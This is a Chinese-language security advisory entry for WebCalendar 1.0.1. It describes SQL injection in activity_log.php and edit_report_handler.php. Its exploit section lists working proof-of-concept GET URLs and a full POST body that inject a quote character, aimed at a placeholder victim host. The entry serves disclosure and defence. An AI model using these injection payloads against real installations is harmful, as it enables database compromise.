添加时间:
2008-10-03

系统编号:
WAVDB-00877
BUGTRAQ: 15662

影响版本:
WebCalendar 1.0.1

程序介绍:

WebCalendar是一款基于WEB的日历系统。

漏洞分析:

WebCalendar的activity_log.php和edit_report_handler.php模块没有正确的验证输入参数，导致了多个SQL注入漏洞。成功利用这些漏洞的攻击者可以完全入侵数据库系统。

漏洞利用:

http://victimhost/webcalendar/activity_log.php?startid=%2527
http://victimhost/webcalendar/activity_log.php?startid=%27
http://victimhost/webcalendar/activity_log.php?startid='

向http://victimhost/webcalendar/edit_report_handler.php 
POST以下变量：

report_name=Unnamed%20Report&is_global=Y&show_in_trailer=Y&include_header=Y&time_range='&cat_id=1&allow_nav=Y&include_empty=Y&page_template=%26lt%3Bdl%26gt%3B%24%7Bdays%7D%26lt%3B%2Fdl%26gt%3B&day_template=%26lt%3Bdt%26gt%3B%26lt%3Bb%26gt%3B%24%7Bdate%7D%26lt%3B%2Fb%26gt%3B%26lt%3B%2Fdt%26gt%3B%0A%26lt%3Bdd%26gt%3B%26lt%3Bdl%26gt%3B%24%7Bevents%7D%26lt%3B%2Fdl%26gt%3B%26lt%3B%2Fdd%26gt%3B&event_template=%26lt%3Bdt%26gt%3B%24%7Bname%7D%26lt%3B%2Fdt%26gt%3B%0A%26lt%3Bdd%26gt%3B%26lt%3Bb%26gt%3BDate%3A%26lt%3B%2Fb%26gt%3B%20%24%7Bdate%7D%26lt%3Bbr%20%2F%26gt%3B%0A%26lt%3Bb%26gt%3BTime%3A%26lt%3B%2Fb%26gt%3B%20%24%7Btime%7D%26lt%3Bbr%20%2F%26gt%3B%0A%24%7Bdescription%7D%26lt%3B%2Fdd%26gt%3B

解决方案:
厂商补丁：
WebCalendar
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://webcalendar.sourceforge.net/

信息来源:
<*来源：lwang （lwang@lwang.org）
链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113347882110672&w=2
*>